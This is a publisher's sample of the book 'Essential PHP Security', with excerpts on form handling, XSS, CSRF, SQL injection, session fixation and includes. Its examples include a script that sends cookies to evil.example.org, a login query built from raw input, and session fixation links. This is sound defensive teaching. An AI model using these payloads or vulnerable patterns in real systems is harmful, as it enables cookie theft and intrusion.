BUY THIS BOOK
Add to Cart

Print Book $29.95


Add to Cart

PDF $23.99

Safari Books Online

What is this?

Add to UK Cart

Print Book £20.95

What is this?

Looking to Reprint or License this content?


Essential PHP Security
Essential PHP Security

By Chris Shiflett
Book Price: $29.95 USD
£20.95 GBP
PDF Price: $23.99

Cover | Table of Contents | Colophon


Table of Contents

Chapter 1: Introduction
PHP has grown from a set of tools for personal home page development to the world's most popular web programming language, and it now powers many of the Web's most frequented destinations. Along with such a transition comes new concerns, such as performance, maintainability, scalability, reliability, and (most importantly) security .
Unlike language features such as conditional expressions and looping constructs, security is abstract. In fact, security is not a characteristic of a language as much as it is a characteristic of a developer. No language can prevent insecure code, although there are language features that can aid or hinder a security-conscious developer.
This book focuses on PHP and shows you how to write secure code by leveraging PHP's unique features. The concepts in this book, however, are applicable to any web development platform.
Web application security is a young and evolving discipline. This book teaches best practices that are theoretically sound, so that you can sleep at night instead of worrying about the new attacks and techniques that are constantly being developed by those with malicious intentions. However, it is wise to keep yourself informed of new advances in the field, and there are a few resources that can help:
http://phpsecurity.org/
This book's companion web site
http://phpsec.org/
The PHP Security Consortium
http://shiflett.org/
My personal web site and blog
This chapter provides the foundation for the rest of the book. It focuses on teaching you the principles and practices that are prerequisities for the lessons that follow.
PHP has many unique features that make it very well-suited for web development. Common tasks that are cumbersome in other languages are a cinch in PHP, and this has both advantages and disadvantages. One feature in particular has attracted more attention than any other, and that feature is
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
PHP Features
PHP has many unique features that make it very well-suited for web development. Common tasks that are cumbersome in other languages are a cinch in PHP, and this has both advantages and disadvantages. One feature in particular has attracted more attention than any other, and that feature is register_globals.
If you remember writing CGI applications in C in your early days of web application development, you know how tedious form processing can be. With PHP's register_globals directive enabled, the complexity of parsing raw form data is taken care of for you, and global variables are created from numerous remote sources. This makes writing PHP applications very easy and convenient, but it also poses a security risk.
In truth, register_globals is unfairly maligned. Alone, it does not create a security vulnerability—a developer must make a mistake. However, two primary reasons you should develop and deploy applications with register_globals disabled are that it:
  • Can increase the magnitude of a security vulnerability
  • Hides the origin of data, conflicting with a developer's responsibility to keep track of data at all times
All examples in this book assume register_globals to be disabled. Instead, I use superglobal arrays such as $_GET and $_POST. Using these arrays is nearly as convenient as relying on register_globals, and the slight lack of convenience is well worth the increase in security.
If you must develop an application that might be deployed in an environment in which register_globals is enabled, it is very important that you initialize all variables and set error_reporting to E_ALL (or E_ALL | E_STRICT) to alert yourself to the use of uninitialized variables. Any use of an uninitialized variable is almost certainly a security vulnerability when register_globals is enabled.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Principles
You can adopt many principles to develop more secure applications. I have chosen a small, focused list of the principles that I consider to be most important to a PHP developer.
These principles are intentionally abstract and theoretical in nature. Their purpose is to provide a broad perspective that can guide you as you focus on the details. Consider them your road map.
Defense in Depth is a well-known principle among security professionals. It describes the fact that there is value in redundant safeguards, and history supports this.
The principle of Defense in Depth extends beyond programming. A skydiver who has ever needed to use a reserve canopy can attest to the value in having a redundant safeguard. After all, the main canopy is never meant to fail. A redundant safeguard can potentially save the day when the primary safeguard fails.
In the context of programming, adhering to Defense in Depth requires that you always have a backup plan. If a particular safeguard fails, there should be another to offer some protection. For example, it is a good practice to prompt a user to reauthenticate before performing some important action, even if there are no known flaws in your authentication logic. If an unauthenticated user is somehow impersonating another user, prompting for the user's password can potentially prevent the unauthenticated (and therefore unauthorized) user from performing a critical action.
Although Defense in Depth is a sound principle, be aware that security safeguards become more expensive and less valuable as they are accrued.
I used to drive a car that had a valet key. This key worked only in the ignition, so it could not be used to unlock the console, the trunk, or even the doors—it could be used only to start the car. I could give this key to someone parking my car (or simply leave it in the ignition), and I was assured that the key could be used for no other purpose.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Practices
Like the principles described in the previous section, there are many practices that you can employ to develop more secure applications. This list of practices is also small and focused to highlight the ones that I consider to be most important.
Some of these practices are abstract, but each has practical applications, which are described to clarify the intended use and purpose of each.
While user friendliness and security safeguards are not mutually exclusive, steps taken to increase security often decrease usability. While it's important to consider illegitimate uses of your applications as you write your code, it's also important to be mindful of your legitimate users. The appropriate balance can be difficult to achieve, and it's something that you have to determine for yourself—no one else can determine the best balance for your applications.
Try to employ the use of safeguards that are transparent to the user. If this isn't possible, try to use safeguards that are already familiar to the user (or likely to be). For example, providing a username and password to gain access to restricted information or services is an expected procedure.
When you suspect foul play, realize that you might be mistaken and act accordingly. For example, it is a common practice to prompt users to enter their password again whenever their identity is in question. This is a minor hassle to legitimate users but a substantial obstacle to an attacker. Technically, this is almost identical to prompting users to authenticate themselves again entirely, but the user experience is much friendlier.
There is very little to gain by logging users out entirely or chiding them about an alleged attack. These approaches degrade usability substantially when you make a mistake, and mistakes happen.
In this book, I focus on providing safeguards that are either transparent or expected, and I encourage careful and sensible reactions to suspected attacks.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 2: Forms and URLs
This chapter discusses form processing and the most common types of attacks that you need to be aware of when dealing with data from forms and URLs. You will learn about attacks such as cross-site scripting (XSS) and cross-site request forgeries (CSRF), as well as how to spoof forms and raw HTTP requests manually.
By the end of the chapter, you will not only see examples of these attacks, but also what practices you can employ to help prevent them.
Vulnerabilites such as cross-site scripting exist when you misuse tainted data. While the predominant source of input for most applications is the user, any remote entity can supply malicious data to your application. Thus, many of the practices described in this chapter are directly applicable to handling input from any remote entity, not just the user. See Chapter 1 for more information about input filtering.
When developing a typical PHP application, the bulk of your logic involves data processing—tasks such as determining whether a user has logged in successfully, adding items to a shopping cart, and processing a credit card transaction.
Data can come from numerous sources, and as a security-conscious developer, you want to be able to easily and reliably distinguish between two distinct types of data:
  • Filtered data
  • Tainted data
Anything that you create yourself is trustworthy and can be considered filtered. An example of data that you create yourself is anything hardcoded, such as the email address in the following example:
    $email = 'chris@example.org';
This email address, chris@example.org, does not come from any remote source. This obvious observation is what makes it trustworthy. Any data that originates from a remote source is input, and all input is tainted , which is why it must always be filtered before you use it.
Tainted data is anything that is not guaranteed to be valid, such as form data submitted by the user, email retrieved from an IMAP server, or an XML document sent from another web application. In the previous example,
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Forms and Data
When developing a typical PHP application, the bulk of your logic involves data processing—tasks such as determining whether a user has logged in successfully, adding items to a shopping cart, and processing a credit card transaction.
Data can come from numerous sources, and as a security-conscious developer, you want to be able to easily and reliably distinguish between two distinct types of data:
  • Filtered data
  • Tainted data
Anything that you create yourself is trustworthy and can be considered filtered. An example of data that you create yourself is anything hardcoded, such as the email address in the following example:
    $email = 'chris@example.org';
This email address, chris@example.org, does not come from any remote source. This obvious observation is what makes it trustworthy. Any data that originates from a remote source is input, and all input is tainted , which is why it must always be filtered before you use it.
Tainted data is anything that is not guaranteed to be valid, such as form data submitted by the user, email retrieved from an IMAP server, or an XML document sent from another web application. In the previous example, $email is a variable that contains filtered data—the data is the important part, not the variable. A variable is just a container for the data, and it can always be overwritten later in the script with tainted data :
    $email = $_POST['email'];
Of course, this is why $email is called a variable. If you don't want the data to change, use a constant instead:
    define('EMAIL', 'chris@example.org');
When defined with the syntax shown here, EMAIL is a constant whose value is chris@example.org for the duration of the script, even if you attempt to assign it another value (perhaps by accident). For example, the following code outputs chris@example.org (the attempt to redefine EMAIL also generates a notice):
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Semantic URL Attacks
Curiosity is the motivation behind many attacks, and semantic URL attacks are a perfect example. This type of attack involves the user modifying the URL in order to discover what interesting things can be done. For example, if the user chris clicks a link in your application and arrives at http://example.org/private.php?user=chris, it is reasonable to assume that he will try to see what happens when the value for user is changed. For example, he might visit http://example.org/private.php?user=rasmus to see if he can access someone else's information. While GET data is only slightly more convenient to manipulate than POST data, its increased exposure makes it a more frequent target, particularly for novice attackers.
Most vulnerabilities exist because of oversight, not because of any particular complexity associated with the exploits. Any experienced developer can easily recognize the danger in trusting a URL in the way just described, but this isn't always clear until someone points it out.
To better illustrate a semantic URL attack and how a vulnerability can go unnoticed, consider a web-based email application where users can log in and check their example.org email accounts. Any application that requires its users to log in needs to provide a password reminder mechanism. A common technique for this is to ask the user a question that a random attacker is unlikely to know (the mother's maiden name is a common query, but allowing the user to specify a unique question and its answer is better) and email a new password to the email address already stored in the user's account.
With a web-based email application, an email address may not already be stored, so a user who answers the verification question may be asked to provide one (the purpose being not only to send the new password to this address, but also to collect an alternative address for future use). The following form asks a user for an alternative email address, and the account name is identified in a hidden form variable:
    <form action="reset.php" method="GET">
    <input type="hidden" name="user" value="chris" />
    <p>Please specify the email address where you want your new password sent:</p>
    <input type="text" name="email" /><br />
    <input type="submit" value="Send Password" />
    </form>
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
File Upload Attacks
Sometimes you want to give users the ability to upload files in addition to standard form data. Because files are not sent in the same way as other form data, you must specify a particular type of encoding—multipart/form-data:
    <form action="upload.php" method="POST" enctype="multipart/form-data">
An HTTP request that includes both regular form data and files has a special format, and this enctype attribute is necessary for the browser's compliance.
The form element you use to allow the user to select a file for upload is very simple:
    <input type="file" name="attachment" />
The rendering of this form element varies from browser to browser. Traditionally, the interface includes a standard text field as well as a browse button, so that the user can either enter the path to the file manually or browse for it. In Safari, only the browse option is available. Luckily, the behavior from a developer's perspective is the same.
To better illustrate the mechanics of a file upload, here's an example form that allows a user to upload an attachment:
    <form action="upload.php" method="POST" enctype="multipart/form-data">
    <p>Please choose a file to upload:
    <input type="hidden" name="MAX_FILE_SIZE" value="1024" />
    <input type="file" name="attachment" /><br />
    <input type="submit" value="Upload Attachment" /></p>
    </form>
The hidden form variable MAX_FILE_SIZE indicates the maximum file size (in bytes) that the browser should allow. As with any client-side restriction, this is easily defeated by an attacker, but it can act as a guide for your legitimate users. The restriction needs to be enforced on the server side in order to be considered reliable.
The PHP directive upload_max_filesize can be used to control the maximum file size allowed, and post_max_size can potentially restrict this as well, because file uploads are included in the POST data.
The receiving script, upload.php
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Cross-Site Scripting
Cross-site scripting (XSS) is deservedly one of the best known types of attacks. It plagues web applications on all platforms, and PHP applications are certainly no exception.
Any application that displays input is at risk—web-based email applications, forums, guestbooks, and even blog aggregators. In fact, most web applications display input of some type—this is what makes them interesting, but it is also what places them at risk. If this input is not properly filtered and escaped, a cross-site scripting vulnerability exists.
Consider a web application that allows users to enter comments on each page. The following form can be used to facilitate this:
    <form action="comment.php" method="POST" />
    <p>Name: <input type="text" name="name" /><br />
    Comment: <textarea name="comment" rows="10" cols="60"></textarea><br />
    <input type="submit" value="Add Comment" /></p>
    </form>
The application displays comments to other users who visit the page. For example, code similar to the following can be used to output a single comment ($comment) and corresponding name ($name):
    <?php

    echo "<p>$name writes:<br />";
    echo "<blockquote>$comment</blockquote></p>";

    ?>
This approach places a significant amount of trust in the values of both $comment and $name. Imagine that one of them contained the following:
    <script>
    document.location =
      'http://evil.example.org/steal.php?cookies=' +
      document.cookie
    </script>
If this comment is sent to your users, it is no different than if you had allowed someone else to add this bit of JavaScript to your source. Your users will involuntarily send their cookies (the ones associated with your application) to evil.example.org, and the receiving script (steal.php) can access all of the cookies in $_GET['cookies'].
This is a common mistake, and it is proliferated by many bad habits that have become commonplace. Luckily, the mistake is easy to avoid. Because the risk exists only when you output tainted, unescaped data, you can simply make sure that you filter input and escape output as described in Chapter 1.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Cross-Site Request Forgeries
A cross-site request forgery (CSRF) is a type of attack that allows an attacker to send arbitrary HTTP requests from a victim. The victim is an unknowing accomplice—the forged requests are sent by the victim, not the attacker. Thus, it is very difficult to determine when a request represents a CSRF attack. In fact, if you have not taken specific steps to mitigate the risk of CSRF attacks, your applications are most likely vulnerable.
Consider a sample application that allows users to buy items—either pens or pencils. The interface includes the following form:

    <form action="buy.php" method="POST">
    <p>
    Item:
    <select name="item">
      <option name="pen">pen</option>
      <option name="pencil">pencil</option>
    </select><br />
    Quantity: <input type="text" name="quantity" /><br />
    <input type="submit" value="Buy" />
    </p>
    </form>
An attacker can use your application as intended to do some basic profiling. For example, an attacker can visit this form to discover that the form elements are item and quantity. The attacker also learns that the expected values of item are pen and pencil.
The buy.php script processes this information:
    <?php

    session_start();
    $clean = array();

    if (isset($_REQUEST['item'] && isset($_REQUEST['quantity']))
    {
      /* Filter Input ($_REQUEST['item'], $_REQUEST['quantity']) */

      if (buy_item($clean['item'], $clean['quantity']))
      {
        echo '<p>Thanks for your purchase.</p>';
      }
      else
      {
        echo '<p>There was a problem with your order.</p>';
      }
    }

    ?>
An attacker can first use your form as intended to observe the behavior. For example, after purchasing a single pen, the attacker knows to expect a message of thanks when a purchase is successful. After noting this, the attacker can then try to see whether GET data can be used to perform the same action by visiting the following URL:
    http://store.example.org/buy.php?item=pen&quantity=1
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Spoofed Form Submissions
Spoofing a form is almost as easy as manipulating a URL. After all, the submission of a form is just an HTTP request sent by the browser. The request format is somewhat determined by the form, and some of the data within the request is provided by the user.
Most forms specify an action as a relative URL:
    <form action="process.php" method="POST">
The browser requests the URL identified by the action attribute upon form submission, and it uses the current URL to resolve relative URLs. For example, if the previous form is in the response to a request for http://example.org/path/to/form.php, the URL requested after the user submits the form is http://example.org/path/to/process.php.
Knowing this, it is easy to realize that you can indicate an absolute URL, allowing the form to reside anywhere:
    <form action="http://example.org/path/to/process.php" method="POST">
This form can be located anywhere, and a request sent using this form is identical to a request sent using the original form. Knowing this, an attacker can view the source of a page, save that source to his server, and modify the action attribute to specify an absolute URL. With these modifications in place, the attacker can alter the form as desired—whether to eliminate a maxlength restriction, eliminate client-side data validation, alter the value of hidden form elements, or modify form element types to provide more flexibility. These modifications help an attacker to submit arbitrary data to the server, and the process is very easy and convenient—the attacker doesn't have to be an expert.
Although it might seem surprising, form spoofing isn't something you can prevent, nor is it something you should worry about. As long as you properly filter input, users have to abide by your rules. However they choose to do so is irrelevant.
If you experiment with this technique, you may notice that most browsers include a Referer header that indicates the previously requested parent resource. In this case, Referer indicates the URL of the form. Resist the temptation to use this information to distinguish between requests sent using your form and those sent using a spoofed form. As demonstrated in the next section, HTTP headers are also easy to manipulate, and the expected value of
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Spoofed HTTP Requests
A more sophisticated attack than spoofing forms is spoofing a raw HTTP request. This gives an attacker complete control and flexibility, and it further proves how no data provided by the user should be blindly trusted.
To demonstrate this, consider a form located at http://example.org/form.php:
    <form action="process.php" method="POST">
    <p>Please select a color:
    <select name="color">
      <option value="red">Red</option>
      <option value="green">Green</option>
      <option value="blue">Blue</option>
    </select><br />
    <input type="submit" value="Select" /></p>
    </form>
If a user chooses Red from the list and clicks Select, the browser sends an HTTP request:
    POST /process.php HTTP/1.1
    Host: example.org
    User-Agent: Mozilla/5.0 (X11; U; Linux i686)
    Referer: http://example.org/form.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 9

    color=red
Seeing that most browsers include the referring URL this way in the request, you may be tempted to write logic that checks $_SERVER['HTTP_REFERER'] to prevent form spoofing. This would indeed prevent an attack that is mounted with a standard browser, but an attacker is not necessarily hindered by such minor inconveniences. By modifying the raw HTTP request, an attacker has complete control over the value of HTTP headers, GET and POST data, and quite literally, everything within the HTTP request.
How can an attacker modify the raw HTTP request? The process is simple. Using the telnet utility available on most platforms, you can communicate directly with a remote web server by connecting to the port on which the web server is listening (typically port 80). The following is an example of manually requesting the front page of http://example.org/ using this technique:
    $ telnet example.org 80
    Trying 192.0.34.166...
    Connected to example.org (192.0.34.166).
    Escape character is '^]'.
    GET / HTTP/1.1
    Host: example.org
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 3: Databases and SQL
PHP's role is often that of a conduit between various data sources and the user. In fact, some people describe PHP more as a platform than just a programming language. To this end, PHP is frequently used to interact with a database.
PHP is well suited for this role, particularly due to the extensive list of databases with which it can communicate. The following list is a small sample of the databases that PHP supports:
DB2
ODBC
SQLite
InterBase
Oracle
Sybase
MySQL
PostgreSQL
DBM
As with any remote data store, databases carry their own risks. Although database security is not a topic that this book covers, the security of the database is something to keep in mind, particularly concerning whether to consider data obtained from the database as input .
As discussed in Chapter 1, all input must be filtered, and all output must be escaped. When dealing with a database, this means that all data coming from the database must be filtered, and all data going to the database must be escaped.
A common mistake is to forget that a SELECT query is data that is being sent to the database. Although the purpose of the query is to retrieve data, the query itself is output.
Many PHP developers fail to filter data coming from the database because only filtered data is stored therein. While the security risk inherent in this approach is slight, it is still not a best practice and not an approach that I recommend. This approach places trust in the security of the database, and it also violates the principle of Defense in Depth. Remember, redundant safeguards have value, and this is a perfect example. If malicious data is somehow injected into the database, your filtering logic can catch it, but only if such logic exists.
This chapter covers a few other topics of concern, including exposed access credentials and SQL injection. SQL injection is of particular concern due to the frequency with which such vulnerabilities are discovered in popular PHP applications.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Exposed Access Credentials
One of the primary concerns related to the use of a database is the disclosure of the database access credentials—the username and password. For convenience, these might be stored in a file named db.inc:
<?php

$db_user = 'myuser';
$db_pass = 'mypass';
$db_host = '127.0.0.1';

$db = mysql_connect($db_host, $db_user, $db_pass);

?>
Both myuser and mypass are sensitive, so they warrant particular attention. Their presence in your source code poses a risk, but it is an unavoidable one. Without them, your database cannot be protected with a username and password.
If you look at a default httpd.conf (Apache's configuration file), you can see that the default type is text/plain. This poses a particular risk when a file such as db.inc is stored within document root. Every resource within document root has a corresponding URL, and because Apache does not typically have a particular content type associated with .inc files, a request for such a resource will return the source in plain text (the default type), including the database access credentials.
To further explain this risk, consider a server with a document root of /www. If db.inc is stored in /www/inc, it has its own URL—http://example.org/inc/db.inc (assuming that example.org is the host). Visiting this URL displays the source of db.inc in plain text. Thus, your access credentials risk exposure if db.inc is stored in any subdirectory of /www, document root.
The best solution to this particular problem is to store your includes outside of document root. You do not need to have them in any particular place in the filesystem to be able to include or require them—all you need to do is ensure that the web server has read privileges. Therefore, it is an unnecessary risk to place them within document root, and any method that attempts to minimize this risk without relocating all includes outside of document root is subpar. In fact, you should place only resources that absolutely must be accessible via URL within document root. It is, after all, a public directory.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
SQL Injection
SQL injection is one of the most common vulnerabilities in PHP applications. What is particularly surprising about this fact is that an SQL injection vulnerability requires two failures on the part of the developer—a failure to filter data as it enters the application (filter input), and a failure to escape data as it is sent to the database (escape output). Neither of these crucial steps should ever be omitted, and both steps deserve particular attention in an attempt to minimize errors.
SQL injection typically requires some speculation and experimentation on the part of the attacker—it is necessary to make an educated guess about your database schema (assuming, of course, that the attacker does not have access to your source code or database schema). Consider a simple login form:
<form action="/login.php" method="POST">
<p>Username: <input type="text" name="username" /></p>
<p>Password: <input type="password" name="password" /></p>
<p><input type="submit" value="Log In" /></p>
</form>
Figure 3-1 shows how this form looks when rendered in a browser.
An attacker presented with this form begins to speculate about the type of query that you might be using to validate the username and password provided. By viewing the HTML source, the attacker can begin to make guesses about your habits regarding
Figure 3-1: A basic login form displayed in a browser
naming conventions. A common assumption is that the names used in the form match columns in the database table. Of course, making sure that these differ is not a reliable safeguard.
A good first guess, as well as the actual query that I will use in the following discussion, is as follows:
<?php

$password_hash = md5($_POST['password']);

$sql = "SELECT count(*)
        FROM   users
        WHERE  username = '{$_POST['username']}'
        AND    password = '$password_hash'";

?>
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Exposed Data
Another concern regarding databases is the exposure of sensitive data. Whether you're storing credit card numbers, social security numbers, or something else, you want to make sure that the data in your database is safe.
While protecting the security of the database itself is outside the scope of this book (and most likely outside a PHP developer's responsibility), you can encrypt the data that is most sensitive, so that a compromise of the database is less disastrous as long as the key is kept safe. See Appendix C for more information about cryptography.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 4: Sessions and Cookies
This chapter discusses sessions and the inherent risks associated with stateful web applications. You will first learn the fundamentals of state, cookies , and sessions; then I will discuss several concerns—cookie theft, exposed session data, session fixation, and session hijacking—along with practices that you can employ to help prevent them.
The rumors are true: HTTP is a stateless protocol. This description recognizes the lack of association between any two HTTP requests. Because the protocol does not provide any method that the client can use to identify itself, the server cannot distinguish between clients.
While the stateless nature of HTTP has some important benefits—after all, maintaining state requires some overhead—it presents a unique challenge to developers who need to create stateful web applications. With no way to identify the client, it is impossible to determine whether the user is already logged in, has items in a shopping cart, or needs to register.
An elegant solution to this problem, originally conceived by Netscape, is a state management mechanism called cookies. Cookies are an extension of the HTTP protocol. More precisely, they consist of two HTTP headers: the Set-Cookie response header and the Cookie request header.
When a client sends a request for a particular URL, the server can opt to include a Set-Cookie header in the response. This is a request for the client to include a corresponding Cookie header in its future requests. Figure 4-1 illustrates this basic exchange.
Figure 4-1: A complete cookie exchange that involves two HTTP transactions
If you use this concept to allow a unique identifier to be included in each request (in a Cookie header), you can begin to uniquely identify clients and associate their requests together. This is all that is required for state, and this is the primary use of the mechanism.
The best reference for cookies is still the specification provided by Netscape at http://wp.netscape.com/newsref/std/cookie_spec.html
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Cookie Theft
One risk associated with the use of cookies is that a user's cookies can be stolen by an attacker. If the session identifier is kept in a cookie, cookie disclosure is a serious risk, because it can lead to session hijacking .
Figure 4-2: PHP handles the complexity of session management for you
The two most common causes of cookie disclosure are browser vulnerabilities and cross-site scripting (discussed in Chapter 2). While no such browser vulnerabilities are known at this time, there have been a few in the past—the most notable ones are in Internet Explorer Versions 4.0, 5.0, 5.5, and 6.0 (corrective patches are available for each of these vulnerabilities).
While browser vulnerabilities are certainly not the fault of web developers, you may be able to take steps to mitigate the risk to your users. In some cases, you may be able to implement safeguards that practically eliminate the risk. At the very least, you can try to educate your users and direct them to a patch to fix the vulnerability.
For these reasons, it is good to be aware of new vulnerabilities. There are a few web sites and mailing lists that you can keep up with, and many services are beginning to offer RSS feeds, so that you can simply subscribe to the feed and be alerted to new vulnerabilities. SecurityFocus maintains a list of software vulnerabilities at http://online.securityfocus.com/vulnerabilities, and you can filter these advisories by vendor, title, and version. The PHP Security Consortium also maintains summaries of the SecurityFocus newsletters at http://phpsec.org/projects/vulnerabilities/securityfocus.html.
Cross-site scripting is a more common approach used by attackers to steal cookies. An attacker can use several approaches, one of which is described in Chapter 2. Because client-side scripts have access to cookies, all an attacker must do is write a script that delivers this information. Creativity is the only limiting factor.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Exposed Session Data
Session data often consists of personal information and other sensitive data. For this reason, the exposure of session data is a common concern. In general, the exposure is minimal, because the session data store resides in the server environment, whether in a database or the filesystem. Therefore, session data is not inherently subject to public exposure.
Enabling SSL is a particularly useful way to minimize the exposure of data being sent between the client and the server, and this is very important for applications that exchange sensitive data with the client. SSL provides a layer of security beneath HTTP, so that all data within HTTP requests and responses is protected.
If you are concerned about the security of the session data store itself, you can encrypt it so that session data cannot be read without the appropriate key. This is most easily achieved in PHP by using session_set_save_handler() and writing your own session storage and retrieval functions that encrypt session data being stored and decrypt session data being read. See Appendix C for more information about encrypting a session data store.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Session Fixation
A major concern regarding sessions is the secrecy of the session identifier. If this is kept secret, there is no practical risk of session hijacking. With a valid session identifier, an attacker is much more likely to successfully impersonate one of your users.
An attacker can use three primary methods to obtain a valid session identifier:
  • Prediction
  • Capture
  • Fixation
PHP generates a very random session identifier, so prediction is not a practical risk. Capturing a session identifier is more common—minimizing the exposure of the session identifier, using SSL, and keeping up with browser vulnerabilities can help you mitigate the risk of capture.
Keep in mind that a browser includes a Cookie header in all requests that satisfy the requirements set forth in a previous Set-Cookie header. Quite commonly, the session identifier is being exposed unnecessarily in requests for embedded resources, such as images. For example, to request a web page with 10 images, the session identifier is being sent by the browser in 11 different requests, but it is needed for only 1 of those. To avoid this unnecessary exposure, you might consider serving all embedded resources from a server with a different domain name.
Session fixation is an attack that tricks the victim into using a session identifier chosen by the attacker. It is the simplest method by which the attacker can obtain a valid session identifier.
In the simplest case, a session fixation attack uses a link:
    <a href="http://example.org/index.php?PHPSESSID=1234">Click Here</a>
Another approach is to use a protocol-level redirect:
    <?php

    header('Location: http://example.org/index.php?PHPSESSID=1234');

    ?>
The Refresh header can also be used—provided as an actual HTTP header or in the http-equiv attribute of a meta tag. The attacker's goal is to get the user to visit a URL that includes a session identifier of the attacker's choosing. This is the first step in a basic attack; the complete attack is illustrated in Figure 4-3.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Session Hijacking
The most common session attack is session hijacking . This refers to any method that an attacker can use to access another user's session. The first step for any attacker is to obtain a valid session identifier, and therefore the secrecy of the session identifier is paramount. The previous sections on exposure and fixation can help you to keep the session identifier a shared secret between the server and a legitimate user.
The principle of Defense in Depth (described in Chapter 1) can be applied to sessions—some minor safeguards can offer some protection in the unfortunate case that the session identifier is known by an attacker. As a security-conscious developer, your goal is to complicate impersonation. Every obstacle, however minor, offers some protection.
The key to complicating impersonation is to strengthen identification. The session identifier is the primary means of identification, and you want to select other data that you can use to augment this. The only data you have available is the data within each HTTP request:
    GET / HTTP/1.1
    Host: example.org
    User-Agent: Firefox/1.0
    Accept: text/html, image/png, image/jpeg, image/gif, */*
    Cookie: PHPSESSID=1234
You want to recognize consistency in requests and treat any inconsistent behavior with suspicion. For example, while the User-Agent header is optional, clients that send it do not often alter its value. If the user with a session identifier of 1234 has been using Mozilla Firefox consistently since logging in, a sudden switch to Internet Explorer should be treated with suspicion. For example, prompting for the password is an effective way to mitigate the risk with minimal impact to your legitimate users in the case of a false alarm. You can check for User-Agent consistency as follows:
    <?php

    session_start();

    if (isset($_SESSION['HTTP_USER_AGENT']))
    {
      if ($_SESSION['HTTP_USER_AGENT'] != md5($_SERVER['HTTP_USER_AGENT']))
      {
        /* Prompt for password */
        exit;
      }
    }
    else
    {
      $_SESSION['HTTP_USER_AGENT'] = md5($_SERVER['HTTP_USER_AGENT']);
    }

    ?>
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Chapter 5: Includes
As PHP projects grow, software design and organization play critical roles in the maintainability of the code. Although opinions concerning best practices are somewhat inconsistent (and a debate about the merits of object-oriented programming often ensues), almost every developer understands and appreciates the value in a modular design.
This chapter addresses security issues related to the use of includes—files that you include or require in a script to divide your application into separate logical units. I also highlight and correct some common misconceptions, particularly those concerning best practices.
References to include and require should also be assumed to include include_once and require_once.
A major concern regarding includes is the exposure of source code. This concern is largely a result of the following common situation:
  • Includes use a .inc file extension.
  • Includes are stored within document root.
  • Apache has no idea what type of resource a .inc file is.
  • Apache has a DefaultType of text/plain.
This state results in your includes being accessible via URL. Worse, they are not parsed by PHP and instead are treated as plain text, resulting in your source code being displayed in the user's browser (see Figure 5-1).
Figure 5-1: Raw source code displayed in a browser
This problem is very easy to avoid. Simply organize your application so that all includes are stored outside of document root. In fact, a best practice is to consider all files stored within document root to be public.
While this may sound unnecessarily paranoid, many situations can cause your source code to be revealed. I have witnessed Apache configuration files being overwritten by mistake (and going unnoticed until the next restart), inexperienced system administrators upgrading Apache but forgetting to add PHP support, and a handful of other scenarios that can expose source code.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Exposed Source Code
A major concern regarding includes is the exposure of source code. This concern is largely a result of the following common situation:
  • Includes use a .inc file extension.
  • Includes are stored within document root.
  • Apache has no idea what type of resource a .inc file is.
  • Apache has a DefaultType of text/plain.
This state results in your includes being accessible via URL. Worse, they are not parsed by PHP and instead are treated as plain text, resulting in your source code being displayed in the user's browser (see Figure 5-1).
Figure 5-1: Raw source code displayed in a browser
This problem is very easy to avoid. Simply organize your application so that all includes are stored outside of document root. In fact, a best practice is to consider all files stored within document root to be public.
While this may sound unnecessarily paranoid, many situations can cause your source code to be revealed. I have witnessed Apache configuration files being overwritten by mistake (and going unnoticed until the next restart), inexperienced system administrators upgrading Apache but forgetting to add PHP support, and a handful of other scenarios that can expose source code.
By storing as much of your PHP code outside of document root as possible, you limit this risk of exposure. At the very least, all includes should be stored outside of document root as a best practice.
Several practices can limit the likelihood of source code exposure but not address the root cause of the problem. These include instructing Apache to process .inc files as PHP, using a .php file extension for includes, and instructing Apache to deny requests for .inc resources:
    <Files ~ "\.inc$">
        Order allow,deny
        Deny from all
    </Files>
While these approaches have merit, none of them is as strong as placing includes outside of document root. Do not rely on these approaches for protection. At most, they can be used for Defense in Depth.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Backdoor URLs
Backdoor URLs are resources that can be accessed directly via URL when direct access is unintended or undesired. For example, a web application might display sensitive information to authenticated users:
    <?php

    $authenticated = FALSE;
    $authenticated = check_auth();

    /* ... */

    if ($authenticated)
    {
        include './sensitive.php';
    }

    ?>
Because sensitive.php is within document root, it can be accessed directly from a browser, bypassing the intended access control. This is because every resource within document root has a corresponding URL. In some cases, these scripts may perform a critical action, escalating the risk.
In order to prevent backdoor URLs, make sure you store your includes outside of document root. The only files that should be stored within document root are those that absolutely must be accessible via URL.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Filename Manipulation
Many situations warrant the use of dynamic includes , where part of the pathname or filename is stored in a variable. For example, you can cache some dynamic parts of your pages to alleviate the burden on your database server:
    <?php

    include "/cache/{$_GET['username']}.html";

    ?>
